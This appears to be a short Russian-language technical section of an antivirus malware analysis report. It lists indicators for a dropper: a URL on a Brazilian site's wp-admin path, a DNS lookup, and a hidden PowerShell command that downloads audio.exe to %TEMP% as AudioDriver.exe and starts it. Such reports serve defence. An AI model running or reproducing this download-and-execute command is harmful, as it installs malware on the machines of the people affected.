Техническая информация
- http://atmosferrdesign.com.br/wp-admin/network/audio.exe как %temp%\audiodriver.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://atmosferrdesign.com.br/wp-admin/network/audio.exe','%TEMP%\AudioDriver.exe'); Start-Process('%...
- DNS ASK at#####rrdesign.com.br
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://atmosferrdesign.com.br/wp-admin/network/audio.exe','%TEMP%\AudioDriver.exe'); Start-Process('%...' (со скрытым окном)